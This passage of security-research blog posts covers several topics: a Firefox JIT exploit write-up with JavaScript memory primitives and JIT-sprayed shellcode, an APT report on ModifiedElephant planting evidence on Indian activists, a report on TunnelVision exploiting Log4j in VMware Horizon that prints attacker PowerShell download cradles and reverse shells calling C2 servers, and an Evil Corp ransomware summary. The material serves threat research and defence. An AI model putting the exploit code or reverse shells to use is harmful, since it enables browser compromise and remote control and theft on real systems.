  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
// Global that holds the target argument so it can be used later
arg = 0;
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
       // If it was null, then we return and try the next one
       return 0;
   }
   // Get the cons value
   let cons = arguments[0][arguments[1]];
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
   // Otherwise just return 0 and try the next one
   return 0;
}

/*
   main - Performs the exploit
*/
function main() {
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ); // Goes on to 480

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
   // Used to hold the leaked data
   let val = 0;
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val << 1;
       if(arg[i] == undefined) val = val | 1;
   }
   return val;
}
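Outside the exploit, the bit-assembly step can be modelled as a standalone sketch (my own illustration, not the exploit code): entries that read back as undefined play the role of deleted arguments, i.e. set bits in RareArgumentsData.

```javascript
// Standalone model of the bit-by-bit read: undefined entries mark set bits,
// assembled least-significant bit first as in the exploit's read loop.
function bitsToUint32(bits) {
    let val = 0;
    for (let i = 31; i >= 0; i--) {
        val = (val << 1) >>> 0;          // shift in the next bit
        if (bits[i] === undefined) {
            val = (val | 1) >>> 0;       // "deleted" -> bit set
        }
    }
    return val;
}
// Bits 0 and 4 "deleted" -> 0b10001 = 17
const sample = [undefined, 1, 1, 1, undefined, ...Array(27).fill(1)];
console.log(bitsToUint32(sample)); // 17
```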

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.
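The set-only behaviour can be modelled directly (again a sketch of my own, not engine code): deleting an argument sets its bit, and there is no operation that clears one.

```javascript
// Model of the deleted-arguments bitmap: delete sets a bit; re-assigning
// the argument allocates a new property instead, so bits are never cleared.
class DeletedBitmap {
    constructor() { this.bits = 0n; }
    markDeleted(i) { this.bits |= 1n << BigInt(i); } // set-only, no clear
}
const bm = new DeletedBitmap();
bm.markDeleted(0);
bm.markDeleted(3);
bm.markDeleted(3); // repeating has no effect; there is no way to unset
console.log(bm.bits.toString(2)); // 1001
```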

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.
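Numerically, the faking step is just an OR of set bits over the raw address written as a double; the tag value below is illustrative rather than Spidermonkey's exact object-tag encoding:

```javascript
// Step 1: the raw 48-bit pointer, written as a double by the corrupted array.
const rawPtr = 0x00007f1234567890n;
// Step 2: high bits OR'd in via the set-only deleted-arguments bitmap.
// (Illustrative tag value - not the exact Spidermonkey NaN-Box tag.)
const tagBits = 0xfffen << 48n;
const boxed = rawPtr | tagBits;
console.log(boxed.toString(16)); // fffe7f1234567890
```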

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straightforward by iterating backwards from the RareArgumentsData pointer (as the ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation

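These snippets lean on a dbl_to_bigint helper that isn't shown in this excerpt; a conventional definition (reinterpreting the double's raw IEEE-754 bits) would look like this:

```javascript
// Assumed helper (not shown in the original excerpt): reinterpret a
// double's raw bits as a BigInt using overlapping typed-array views.
const convBuf = new ArrayBuffer(8);
const convF64 = new Float64Array(convBuf);
const convU64 = new BigUint64Array(convBuf);
function dbl_to_bigint(d) {
    convF64[0] = d;
    return convU64[0];
}
console.log(dbl_to_bigint(1.0).toString(16)); // 3ff0000000000000
```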
The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   // Set the top 15 bits by deleting the corresponding arguments
   for(let i = 64 - 15; i < 64; i++) delete arg[i];
}

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
   // Set the 5th property of the arguments object
   arg[5] = o;

   // Get the address of the 5th property
   target = ad_location + (7n * 8n) // [len][deleted][0][1][2][3][4][5] (index 7)

   // Set the fake ArrayBuffer backing store to point to this location
   target_uint32arr[14] = parseInt(target) & 0xffffffff;
   target_uint32arr[15] = parseInt(target >> 32n);

   // Read the address of the object o (strip the NaN-Box from the high word)
   return (BigInt(fake_arrbuf[1] & 0xffff) << 32n) + BigInt(fake_arrbuf[0]);
}

Code Execution

With the primitives completed, the only thing left is to get code execution. While there’s nothing particularly new about this method, I will go over it in the interest of completeness.

Unlike Chrome, WASM regions aren’t read-write-execute (RWX) in Firefox. The common way to go about getting code execution is by performing JIT spraying. Simply put, a function containing a number of constant values is made. By executing this function repeatedly, we can cause the browser to JIT compile it. These constants then sit beside each other in a read-execute (RX) region. By changing the function’s JIT region pointer to these constants, they can be executed as if they were instructions:

   // shellcode - Constant values which hold our shellcode to pop xcalc.
function shellcode(){
   find_me = 5.40900888e-315; // 0x41414141 in memory
   A = -6.828527034422786e-229; // 0x9090909090909090
   B = 8.568532312320605e+170;
   C = 1.4813365150669252e+248;
   D = -6.032447120847604e-264;
   E = -6.0391189260385385e-264;
   F = 1.0842822352493598e-25;
   G = 9.241363425014362e+44;
   H = 2.2104256869204514e+40;
   I = 2.4929675059396527e+40;
   J = 3.2459699498717e-310;
   K = 1.637926e-318;
}

   // main - Performs the exploit
function main() {
   for(i = 0;i 

A video of the exploit can be found here.

Wrote an exploit for a very interesting Firefox bug. Gave me a chance to try some new things out!

More coming soon!

— maxpl0it (@maxpl0it) February 1, 2022


Throughout this post we have covered a wide range of topics, such as the basics of JIT compilers in JavaScript engines, vulnerabilities from their assumptions, exploit primitive construction, and even using CodeQL to find variants of vulnerabilities.

Doing so meant that a new set of exploit primitives were found, an unexploitable variant of the vulnerability itself was identified, and a vulnerability with many caveats was exploited.

This blog post highlights the kind of research SentinelLabs does in order to identify exploitation patterns.

ModifiedElephant APT and a Decade of Fabricating Evidence

By: Tom Hegel
10 February 2022 at 04:55

Executive Summary

  • Our research attributes a decade of activity to a threat actor we call ModifiedElephant.
  • ModifiedElephant is responsible for targeted attacks on human rights activists, human rights defenders, academics, and lawyers across India with the objective of planting incriminating digital evidence.
  • ModifiedElephant has been operating since at least 2012, and has repeatedly targeted specific individuals.
  • ModifiedElephant operates through the use of commercially available remote access trojans (RATs) and has potential ties to the commercial surveillance industry.
  • The threat actor uses spearphishing with malicious documents to deliver malware, such as NetWire, DarkComet, and simple keyloggers with infrastructure overlaps that allow us to connect long periods of previously unattributed malicious activity.

Read the Full Report


In September 2021, SentinelLabs published research into the operations of a Turkish-nexus threat actor we called EGoManiac, drawing attention to their practice of planting incriminating evidence on the systems of journalists to justify arrests by the Turkish National Police. A threat actor willing to frame and incarcerate vulnerable opponents is a critically underreported dimension of the cyber threat landscape that brings up uncomfortable questions about the integrity of devices introduced as evidence. Emerging details in an unrelated case caught our attention as a potentially similar scenario worthy of more scrutiny.

Long-standing racial and political tensions in India were inflamed on January 1st, 2018 when critics of the government clashed with pro-government supporters near Bhima Koregaon. The event led to subsequent protests, resulting in more violence and at least one death.

In the following months, Maharashtra police linked the cause of the violence to the banned Naxalite-Maoist Communist party of India. On April 17th, 2018, police conducted raids and arrested a number of individuals on terrorism-related charges. The arresting agencies identified incriminating files on the computer systems of defendants, including plans for an alleged assassination attempt against Prime Minister Modi.

Thanks to the public release of digital forensic investigation results by Arsenal Consulting and those referenced below, we can glean rare insights into the integrity of the systems of some defendants and grasp the origin of the incriminating files. It turns out that a compromise of defendant systems led to the planting of files that were later used as evidence of terrorism and justification for the defendants’ imprisonment. The intrusions in question were not isolated incidents.

Our research into these intrusions revealed a decade of persistent malicious activity targeting specific groups and individuals that we now attribute to a previously unknown threat actor named ModifiedElephant. This actor has operated for years, evading research attention and detection due to their limited scope of operations, the mundane nature of their tools, and their regionally-specific targeting. ModifiedElephant is still active at the time of writing.

ModifiedElephant Targets & Objectives

The objective of ModifiedElephant is long-term surveillance that at times concludes with the delivery of ‘evidence’—files that incriminate the target in specific crimes—prior to conveniently coordinated arrests.

After careful review of the attackers’ campaigns over the last decade, we have identified hundreds of groups and individuals targeted by ModifiedElephant phishing campaigns. Activists, human rights defenders, journalists, academics, and law professionals in India are those most highly targeted. Notable targets include individuals associated with the Bhima Koregaon case.

Infection Attempts

Throughout the last decade, ModifiedElephant operators sought to infect their targets via spearphishing emails with malicious file attachments, with their techniques evolving over time.

Their primary delivery mechanism is malicious Microsoft Office document files weaponized to deliver the malware of choice at the time. The specific payloads changed over the years and across different targets. However, some notable trends remain.

  • In mid-2013, the actor used phishing emails containing executable file attachments with fake double extensions (filename.pdf.exe).
  • After 2015, the actor moved on to less obvious files containing publicly available exploits, such as .doc, .pps, .docx, .rar, and password-protected .rar files. These attempts involved legitimate lure documents in .pdf, .docx, and .mht formats to capture the target’s attention while the malware executed.
  • In 2019 phishing campaigns, ModifiedElephant operators also took the approach of providing links to files hosted externally for manual download and execution by the target.
  • As first publicly noted by Amnesty in reference to a subset of this activity, the attacker also made use of large .rar archives (up to 300MB), potentially in an attempt to bypass detection.
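As a side note for defenders, the fake double-extension trick described in the first bullet is straightforward to flag. A hypothetical filter (the extension lists are illustrative, not taken from the report) might look like:

```javascript
// Hypothetical helper: flag attachment names that hide an executable behind
// a fake document extension, e.g. "filename.pdf.exe" as described above.
const EXEC_EXTS = new Set(["exe", "scr", "com", "pif", "bat"]);
const DOC_EXTS  = new Set(["pdf", "doc", "docx", "pps", "xls"]);

function hasFakeDoubleExtension(filename) {
    const parts = filename.toLowerCase().split(".");
    if (parts.length < 3) return false;           // need at least name.doc.exe
    const last = parts[parts.length - 1];         // real (executable) extension
    const second = parts[parts.length - 2];       // fake (document) extension
    return EXEC_EXTS.has(last) && DOC_EXTS.has(second);
}
```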

Observed lure documents repeatedly made use of CVE-2012-0158, CVE-2014-1761, CVE-2013-3906, and CVE-2015-1641 exploits to drop and execute their malware of choice.

The spearphishing emails and lure attachments are titled and generally themed around topics relevant to the target, such as activism news and groups, global and local events on climate change, politics, and public service. A public deconstruction of two separate 2014 phishing emails was shared by Arsenal Consulting in early 2021.

Spearphishing email containing malicious attachment attributed to ModifiedElephant

ModifiedElephant continually made use of free email service providers, like Gmail and Yahoo, to conduct their campaigns. The phishing emails take many approaches to gain the appearance of legitimacy. This includes fake body content with a forwarding history containing long lists of recipients, original email recipient lists with many seemingly fake accounts, or simply resending their malware multiple times using new emails or lure documents. Notably, in specific attacks, the actor would be particularly persistent and attempt to compromise the same individuals multiple times in a single day.

By reviewing a timeline of attacker activity, we can observe clear trends as the attacker(s) rotate infrastructure over the years.

Timeline sample of ModifiedElephant and SideWinder C2 Infrastructure

For example, from early-2013 to mid-2016, a reasonably clear timeline can be built with little overlap, indicating a potential evolution or expansion of activities. Dates are based on first and last spearphishing emails observed delivering samples that communicate with a given domain. Notably, a separate Indian-nexus threat actor, SideWinder, is placed alongside ModifiedElephant in this graph as they were observed targeting the same individuals.

Weapons of Choice

The malware most used by ModifiedElephant is unsophisticated and downright mundane, and yet it has proven sufficient for their objectives: obtaining remote access to and unrestricted control of victim machines. The primary malware families deployed were the NetWire and DarkComet remote access trojans (RATs). Both of these RATs are publicly available and have a long history of abuse by threat actors across the spectrum of skill and capability.

One particular activity revolves around the file Ltr_1804_to_cc.pdf, which contains details of an assassination plot against Prime Minister Modi. A forensic report by Arsenal Consulting showed that this file, one of the more incriminating pieces of evidence obtained by the police, was one of many files delivered via a NetWire RAT remote session that we associate with ModifiedElephant. Further analysis showed how ModifiedElephant was performing nearly identical evidence creation and organization across multiple unrelated victim systems within roughly fifteen minutes of each other.

Incubator Keylogger

Known victims have also been targeted with keylogger payloads stretching as far back as 2012 (0a3d635eb11e78e6397a32c99dc0fd5a). These keyloggers, packed at delivery, are written in Visual Basic and are not the least bit technically impressive. Moreover, they’re built in such a brittle fashion that they no longer function.

The overall structure of the keylogger is fairly similar to code openly shared on Italian hacking forums in 2012. Further details of the ModifiedElephant variant can be found in our full report.

In some cases, the attacker conducted multiple unique phishing attempts with the same payloads across one or more targets. However, ModifiedElephant generally conducts each infection attempt with new malware samples.

Android Trojan

ModifiedElephant also sent multiple phishing emails containing both NetWire and Android malware payloads at the same time. The Android malware is an unidentified commodity trojan delivered as an APK file (0330921c85d582deb2b77a4dc53c78b3).

While the Android trojan bears marks of being designed for broader cybercrime, its delivery at the same time as ModifiedElephant Netwire samples indicates that the same attacker was attempting to get full coverage of the target on both endpoint and mobile. The full report contains further details about the Android Trojan.

Relations to Other Threat Clusters

Our research into this threat actor reveals multiple interesting threads that highlight the complex nature of targeted surveillance and tasking, where multiple actors swoop in with diverse mechanisms to track the same group of individuals. These include private sector offensive actors (PSOAs) and groups with possible commercial facades to coordinate their illicit activities.

Based on our analysis of ModifiedElephant, the group operates in an overcrowded target space and may have relations with other regional threat actors. From our visibility, we can’t further disambiguate the shape of that relationship–whether as part of an active umbrella organization, cooperation and sharing of technical resources and targets across threat groups, or simply coincidental overlaps. Some interesting overlaps are detailed below.

  • Multiple individuals targeted by ModifiedElephant over the years have also been either targeted or confirmed infected with mobile surveillance spyware. Amnesty International identified NSO Group’s Pegasus being used in targeted attacks in 2019 against human rights defenders related to the Bhima Koregaon case. Additionally, the Bhima Koregaon case defendant Rona Wilson’s iPhone was targeted with Pegasus since 2017 based on a digital forensics analysis of an iTunes backup found in the forensic disk images analyzed by Arsenal Consulting.
  • Between February 2013 and January 2014 one target, Rona Wilson, received phishing emails that can be attributed to the SideWinder threat actor. The relationship between ModifiedElephant and SideWinder is unclear as only the timing and targets of their phishing emails overlap within our dataset. This could suggest that the attackers are being provided with similar tasking by a controlling entity, or that they work in concert somehow. SideWinder is a threat actor targeting government, military, and business entities primarily throughout Asia.
  • ModifiedElephant phishing email payloads (b822d8162dd540f29c0d8af28847246e) share infrastructure overlaps (new-agency[.]us) with Operation Hangover. Operation Hangover includes surveillance efforts against targets of interest to Indian national security, both foreign and domestic, in addition to industrial espionage efforts against organizations around the world.
  • Another curious finding is the inclusion of the string “Logs from Moosa’s” found in a keylogger sample closely associated with ModifiedElephant activity in 2012 (c14e101c055c9cb549c75e90d0a99c0a). The string could be a reference to Moosa Abd-Ali Ali, the Bahrain activist targeted around the same time, with FinFisher spyware. Without greater information, we treat this as a low confidence conjecture in need of greater research.


Attributing an attacker like ModifiedElephant is an interesting challenge. At this time, we possess significant evidence of what the attacker has done over the past decade, a unique look into who they’ve targeted, and a strong understanding of their technical objectives.

We observe that ModifiedElephant activity aligns sharply with Indian state interests and that there is an observable correlation between ModifiedElephant attacks and the arrests of individuals in controversial, politically-charged cases.


The Bhima Koregaon case has offered a revealing perspective into the world of a threat actor willing to place significant time and resources into seeking the disruption of those with opposing views. Our profile of ModifiedElephant has taken a look at a small subset of the total list of potential targets, the attacker’s techniques, and a rare glimpse into their objectives. Many questions about this threat actor and their operations remain; however, one thing is clear: Critics of authoritarian governments around the world must carefully understand the technical capabilities of those who would seek to silence them.

Further details, Indicators of Compromise and Technical References are available in the full report.

Read the Full Report

Log4j2 In The Wild | Iranian-Aligned Threat Actor “TunnelVision” Actively Exploiting VMware Horizon

17 February 2022 at 17:11

By Amitai Ben Shushan Ehrlich and Yair Rigevsky

Executive Summary

  • SentinelLabs has been tracking the activity of an Iranian-aligned threat actor operating in the Middle-East and the US.
  • Due to the threat actor’s heavy reliance on tunneling tools, as well as the unique way it deploys them at scale, we track this cluster of activity as TunnelVision.
  • Much like other Iranian threat actors operating in the region of late, TunnelVision’s activities have been linked to the deployment of ransomware, making the group a potentially destructive actor.


TunnelVision activities are characterized by wide exploitation of 1-day vulnerabilities in target regions. During the time we’ve been tracking this actor, we have observed wide exploitation of Fortinet FortiOS (CVE-2018-13379), Microsoft Exchange (ProxyShell) and, most recently, Log4Shell. In almost all of those cases, the threat actor deployed a tunneling tool wrapped in a unique fashion. The most commonly deployed tunneling tools used by the group are Fast Reverse Proxy Client (FRPC) and Plink.

TunnelVision activities are correlated to some extent with parts of Microsoft’s Phosphorus, as discussed further in the Attribution section.

In this post, we highlight some of the activities we recently observed from TunnelVision operators, focusing around exploitation of VMware Horizon Log4j vulnerabilities.

VMware Horizon Exploitation

The exploitation of Log4j in VMware Horizon is characterized by a malicious process spawned from the Tomcat service of the VMware product (C:\Program Files\VMware\VMware View\Server\bin\ws_TomcatService.exe).

TunnelVision attackers have been actively exploiting the vulnerability to run malicious PowerShell commands, deploy backdoors, create backdoor users, harvest credentials and perform lateral movement.

Typically, the threat actor initially exploits the Log4j vulnerability to run PowerShell commands directly, and then runs further commands by means of PS reverse shells, executed via the Tomcat process.

PowerShell Commands

TunnelVision operators exploited the Log4j vulnerability in VMware Horizon to run PowerShell commands, sending outputs back utilizing a webhook. In this example, the threat actor attempted to download ngrok to a compromised VMware Horizon server:

    (New-Object System.Net.WebClient).DownloadFile("hxxp://","C:\\Users\Public\public.exe");
    Rename-Item 'c://Users//public//new.txt' 'microsoft.exe';
    $a=iex 'dir "c://Users//public//"' | Out-String;
    iwr -method post -body $a{RANDOM-GUID} -UseBasicParsing;
    iwr -method post -body $Error[0]{RANDOM-GUID} -UseBasicParsing;

Throughout the activity, the threat actor made use of multiple legitimate public services. If an environment has been compromised by TunnelVision, it may be helpful to look for outbound connections to any of those services:


Reverse Shell #1

$c = ""
$p = ""
$r = ""
$u = "hxxps://"
$wc = New-Object System.Net.WebClient
$li = (Get-NetIPAddress -AddressFamily IPv4).IPAddress[0];
$c = "whoami"
$c = 'Write-Host " ";'+$c
$r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
$ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
    $c = $wc.DownloadString("$u/$env:COMPUTERNAME-$li/123.txt")
    $c = 'Write-Host " ";'+$c
    if($c -ne $p)
        $r = &(gcm *ke-e*) $c | Out-String > "c:\programdata\$env:COMPUTERNAME-$li"
        $p = $c
        $ur = $wc.UploadFile("$u/phppost.php" , "c:\programdata\$env:COMPUTERNAME-$li")
    sleep 3

Reverse Shell #1 was used in the past by TunnelVision operators (7feb4d36a33f43d7a1bb254e425ccd458d3ea921), utilizing a different C2 server: “hxxp://”. This C2 was referenced in several articles analyzing TunnelVision activities.

Throughout the activity the threat actor leveraged another domain, service-management[.]tk, used to host malicious payloads. According to VirusTotal, this domain was also used to host a zip file (d28e07d2722f771bd31c9ff90b9c64d4a188435a) containing a custom backdoor (624278ed3019a42131a3a3f6e0e2aac8d8c8b438).

The backdoor drops an additional executable file (e76e9237c49e7598f2b3f94a2b52b01002f8e862) to %ProgramData%\Installed Packages\InteropServices.exe and registers it as a service named “InteropServices”.

The dropped executable contains an obfuscated version of the reverse shell as described above, beaconing to the same C2 server (www[.]microsoft-updateserver[.]cf). Although it is not encrypted, it is deobfuscated and executed in a somewhat similar manner to how PowerLess, another backdoor used by the group, executes its PowerShell payload.

Reverse Shell #2

$hst = "";
$prt = 443;
function watcher() {;
    $limit = (Get-Random -Minimum 3 -Maximum 7);
    $stopWatch = New-Object -TypeName System.Diagnostics.Stopwatch;
    $timeSpan = New-TimeSpan -Seconds $limit;
    while ((($stopWatch.Elapsed).TotalSeconds -lt $timeSpan.TotalSeconds)) {};
$arr = New-Object int[] 500;
for ($i = 0;
$i -lt 99;
$i++) {;
    $arr[$i] = (Get-Random -Minimum 1 -Maximum 25);
if ($arr[0] -gt 0) {;
    $valksdhfg = New-Object System.Net.Sockets.TCPClient($hst, $prt);
    $banljsdfn = $valksdhfg.GetStream();
    [byte[]]$bytes = 0..65535|%{0};
    while (($i = $banljsdfn.Read($bytes, 0, $bytes.Length)) -ne 0) {;
        $lkjnsdffaa = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
        $nsdfgsahjxx = (&(gcm('*ke-exp*')) $lkjnsdffaa 2>&1 | Out-String);
        $nsdfgsahjxx2 = $nsdfgsahjxx + (pwd).Path + "> ";
        $sendbyte = ([text.encoding]::ASCII).GetBytes($nsdfgsahjxx2);
        $banljsdfn.Write($sendbyte, 0, $sendbyte.Length);

Most of the “online” activities we observed were performed from this PowerShell backdoor. It seems to be a modified variant of a publicly available PowerShell one-liner.

Among those activities were:

  • Execution of recon commands.
  • Creation of a backdoor user and adding it to the administrators group.
  • Credential harvesting using Procdump, SAM hive dumps and comsvcs MiniDump.
  • Download and execution of tunneling tools, including Plink and Ngrok, used to tunnel RDP traffic.
  • Execution of a reverse shell utilizing VMware Horizon NodeJS component[1,2].
  • Internal subnet RDP scan using a publicly available port scan script.

Throughout the activity, the threat actor utilized a GitHub repository, “VmWareHorizon”, belonging to an attacker-owned account using the name “protections20”.


TunnelVision activities have been discussed previously and are tracked by other vendors under a variety of names, such as Phosphorus (Microsoft) and, confusingly, either Charming Kitten or Nemesis Kitten (CrowdStrike).

This confusion arises because activity that Microsoft recognizes as a single group, “Phosphorus”, overlaps with activity that CrowdStrike distinguishes as belonging to two different actors, Charming Kitten and Nemesis Kitten.

We track this cluster separately under the name “TunnelVision”. This does not imply we believe they are necessarily unrelated, only that there is at present insufficient data to treat them as identical to any of the aforementioned attributions.

Indicators of Compromise

Domain www[.]microsoft-updateserver[.]cf Command and Control (C2) Server
Domain www[.]service-management[.]tk Payload server
IP 51.89.169[.]198 Command and Control (C2) Server
IP 142.44.251[.]77 Command and Control (C2) Server
IP 51.89.135[.]142 Command and Control (C2) Server
IP 51.89.190[.]128 Command and Control (C2) Server
IP 51.89.178[.]210 Command and Control (C2) Server, Tunneling Server
IP 142.44.135[.]86 Tunneling Server
IP 182.54.217[.]2 Payload Server
Github Account Account utilized to host payloads

Sanctions Be Damned | From Dridex to Macaw, The Evolution of Evil Corp

23 February 2022 at 17:46

By Antonio Pirozzi, Antonis Terefos and Idan Weizman

Executive Summary

  • Since OFAC sanctions in 2020, the global intelligence community has been split into different camps as to how Evil Corp is operating.
  • SentinelLabs assesses with high confidence that WastedLocker, Hades, Phoenix Locker, PayloadBIN belong to the same cluster. There are strong overlaps in terms of code similarities, packers, TTPs and configurations.
  • SentinelLabs assesses with high confidence that the Macaw ransomware variant is derived from the same codebase as Hades.
  • Our analysis indicates that Evil Corp became a customer of the CryptOne packer-as-a-service in March 2020. We created a static unpacker for CryptOne, de-CryptOne, and identified different versions of this cryptor which have never previously been reported.

Read the Full Report


Evil Corp (EC) is an advanced cybercrime operations cluster originating from Russia that has been active since 2007. The UK National Crime Agency called it “the world’s most harmful cyber crime group.” In December 2019, the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) issued a sanction against 17 individuals and seven entities related to EC cyber operations for causing financial losses of more than 100 million dollars with Dridex.

After the indictments, the global intelligence community was split into different camps as to how Evil Corp was operating. Some assessed that there was a voluntary transition of EC operations to another ‘trusted’ partner while the core group remained the controller of operations. Some had theories that Evil Corp had stopped operating and that another advanced actor operated Hades, trying to mimic the same modus operandi as Evil Corp to mislead attribution. Others claimed possible attribution to the HAFNIUM activity cluster.

SentinelLabs has conducted an in-depth review and technical analysis of Evil Corp activity, malware and TTPs. Our full report has a number of important findings for the research community. We relied heavily on our analysis of a crypter tool dubbed “CryptOne”, which supports our wider clustering of Evil Corp activity. Our research also argues that the original operators continue to be active despite the sanctions, continuously changing their TTPs in order to stay under the radar.

In this post, we summarize some key observations from our technical analysis on the evolution of Evil Corp from Dridex through to Macaw Locker and, for the first time, publicly describe CryptOne and the role it plays in Evil Corp malware development. For the full technical analysis, comprehensive IOCs and YARA hunting rules, please see the full report.

Overview of Recent Evil Corp Activity

After the OFAC indictment, we witnessed a change in Evil Corp TTPs: from 2020, they started to frequently change their payload signatures, using different exploitation tools and methods of initial access. They switched from Dridex to the SocGholish framework to confuse attribution and distance themselves from both Dridex and Bitpaymer, which fell within the scope of the sanctions. During this period, they started relying more heavily on Cobalt Strike to gain an initial foothold and perform lateral movement, rather than PowerShell Empire.

In May 2020, a new ransomware variant appeared in the wild dubbed WastedLocker. WastedLocker (S0612) employed techniques to obfuscate its code and perform tasks similar to those already seen in BitPaymer and Dridex. Those similarities allowed the threat intelligence community to identify the connections between the malware families.

In December 2020, a new ransomware variant named Hades was first seen in the wild and publicly reported. Hades is a 64-bit compiled version of WastedLocker that displays significant code and functionality overlaps. A few months later, in March 2021, a new variant, Phoenix Locker, appeared in the wild. Our analysis suggests this is a rebranded version of Hades with little to no change. Later, a new variant named PayloadBIN appeared in the wild as a continuation of Phoenix Locker.

A Unique Cluster: BitPaymer, WastedLocker, Hades, Phoenix Locker, PayloadBIN

From our analysis, we discovered evidence of code overlaps, as well as shared configurations, packers and TTPs leading us to assess with high confidence that Bitpaymer, WastedLocker, Hades, PhoenixLocker and PayloadBIN share a common codebase. Our full report goes into the evidence in fine detail. The following section presents a brief summary.

From BitPaymer to WastedLocker

Previous research shows a degree of knowledge reuse between BitPaymer and WastedLocker. SentinelLabs analysis shows that BitPaymer and WastedLocker share the same codebase.

Among other similarities, detailed in the full report, we observe that the RSA functions – responsible for asymmetrically encrypting the keys which were used in the AES phase to encrypt files – are identical in both ransomware variants, hinting that the same utility library was used.

From WastedLocker to Hades

Previous research assessed the main similarities and differences between the two ransomware families. SentinelLabs analysis shows that Hades and WastedLocker share the same codebase.

